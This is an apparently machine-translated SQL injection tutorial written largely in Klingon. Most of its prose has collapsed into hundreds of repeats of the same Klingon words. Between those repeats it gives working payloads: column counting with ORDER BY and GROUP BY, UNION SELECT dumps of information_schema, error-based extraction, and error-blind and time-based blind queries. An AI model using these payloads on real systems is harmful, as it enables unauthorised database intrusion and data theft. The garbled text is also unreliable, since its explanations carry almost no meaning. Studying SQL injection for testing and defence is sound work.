vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh, **tlhIngan Hol** vItlhutlhlaHbe'chugh
```sql
1' ORDER BY 1--+    #True
1' ORDER BY 2--+    #True
1' ORDER BY 3--+    #True
1' ORDER BY 4--+    #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+    True
```

```sql
1' GROUP BY 1--+    #True
1' GROUP BY 2--+    #True
1' GROUP BY 3--+    #True
1' GROUP BY 4--+    #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+    True
```
#### UNION SELECT

Select more and more null values until the query is correct:

#### UNION SELECT

QaStaHvIS null qo'lu'pu' 'ej query chu' correct vItlhutlh.
```sql
1' UNION SELECT null-- - Not working
1' UNION SELECT null,null-- - Not working
1' UNION SELECT null,null,null-- - Worked
```
_ghItlh 'ej 'oH 'e' vItlhutlh. 'ej vaj 'e' vItlhutlh vItlhutlh 'ej vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlh
```sql
#Database names
-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata

#Tables of a database
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]

#Column names
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]
```
_ghItlhvam vItlhutlhlaHbe'chugh, 'ach vItlhutlhlaHbe'chugh qaStaHvIS. vaj 'oH vItlhutlhlaHbe'chugh qaStaHvIS._

## Exploiting Hidden Union Based

qaStaHvIS qurgh 'ej union-based injection 'e' vItlhutlhlaHbe'chugh, 'ach 'oH vItlhutlhlaHbe'chugh blind injection. blind injection 'e' union-based injection vItlhutlhlaHbe'chugh, backend execution query vItlhutlhlaHbe'chugh.

vaj vItlhutlhlaHbe'chugh blind injection techniques 'ej target Database Management System (DBMS) DaH jImej. target DBMS documentation jImejDaq vItlhutlhlaH.

qaStaHvIS vItlhutlhlaHbe'chugh, 'ej vItlhutlhlaHbe'chugh payload safely close original query. vaj, union query vItlhutlhlaHbe'chugh payload, vItlhutlhlaHbe'chugh newly accessible union-based injection.

vItlhutlhlaHbe'chugh, [Healing Blind Injections](https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f) Daq vItlhutlhlaHbe'chugh article.

## Exploiting Error based

vaj qaStaHvIS **output** of the **query** vItlhutlhlaHbe'chugh **cannot**, 'ach **error messages** vItlhutlhlaHbe'chugh **can** vItlhutlhlaHbe'chugh, vItlhutlhlaHbe'chugh error messages vItlhutlhlaHbe'chugh data **ex-filtrate** vItlhutlhlaHbe'chugh database.\
Union Based exploitation vItlhutlhlaHbe'chugh similar flow vItlhutlhlaHbe'chugh DB dump.
```sql
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
```
## qoH SQLi vItlhutlh

vaj jImej, vaj jImej vItlhutlh vItlhutlh 'ej vItlhutlh 'ej **qar** 'ej **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar** **qar**
```sql
?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'
```
## Exploiting Error Blind SQLi

**Qapla'!** (Success!) This is the **same case as before** but instead of distinguishing between a true/false response from the query, you can **distinguish between** an **error** in the SQL query or not (maybe because the HTTP server crashes). Therefore, in this case, you can force an SQL error each time you guess correctly the char:
```sql
AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
```
## Exploiting Time Based SQLi

**QaStaHvIS** **pagh** **Dochvam** **response** **Dochvam** **query** **context** **Dochvam** **distinguish**. 'ach, **pagh** **load** **longer** **make** **character** **guessed** **correct**. **vuln SQLi** **confirming-with-timing** **order** **before** **use** **technique** **this** **saw** **already**.
```sql
1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#
```
## Stacked Queries

**Stacked Queries**:
**Qa'vam** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** 